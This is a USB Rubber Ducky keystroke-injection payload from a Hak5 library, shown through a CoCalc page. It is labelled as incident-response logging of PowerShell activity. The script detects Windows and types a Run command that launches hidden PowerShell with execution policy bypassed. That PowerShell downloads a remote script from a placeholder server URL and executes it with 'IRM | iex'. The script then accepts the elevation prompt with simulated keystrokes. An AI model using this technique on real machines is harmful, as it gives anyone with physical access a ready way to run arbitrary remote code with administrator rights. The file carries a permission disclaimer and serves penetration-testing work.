Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
hak5
GitHub Repository: hak5/usbrubberducky-payloads
 Path: blob/master/payloads/library/incident_response/Global-Powershell-Logging/Payload.txt
2971 views
1
REM Author:      beigeworm 

2
REM Title:       Global-Powershell-Logging

3
REM Target:      Windows 10/11 

4
REM Description: Log all powershell input and output to a text file in the documents folder.

5


6
REM **THIS SCRIPT IS INTENDED FOR USE ON SYSTEMS YOU OWN OR HAVE BEEN GIVEN PERMISSION TO USE!**

7


8
REM Replace the URL for your own hosted .ps1 raw file.

9
DEFINE #SCRIPTURL https://yourserver.com/rawfile/Global-Powershell-Logging.ps1

10


11
REM Funtion to detect Windows is ready for keystrokes

12
EXTENSION PASSIVE_WINDOWS_DETECT

13
    REM VERSION 1.1

14
    REM AUTHOR: Korben

15


16
    REM CONFIGURATION:

17
    DEFINE #MAX_WAIT 150

18
    DEFINE #CHECK_INTERVAL 20

19
    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2

20
    DEFINE #NOT_WINDOWS 7

21


22
    $_OS = #NOT_WINDOWS

23


24
    VAR $MAX_TRIES = #MAX_WAIT

25
    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))

26
        DELAY #CHECK_INTERVAL

27
        $MAX_TRIES = ($MAX_TRIES - 1)

28
    END_WHILE

29
    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN

30
        $_OS = WINDOWS

31
    END_IF

32


33
END_EXTENSION

34


35
IF $_OS != WINDOWS

36
    LED_R                                                                                                                                       

37
    STOP_PAYLOAD 

38
END_IF

39


40
REM Main bad-USB script

41
LED_G

42
GUI r

43
DELAY 750

44
STRING powershell -Ep Bypass -W H -C IRM #SCRIPTURL | iex

45
DELAY 250

46
CTRL-SHIFT ENTER

47
DELAY 2500

48
ALT y

49


50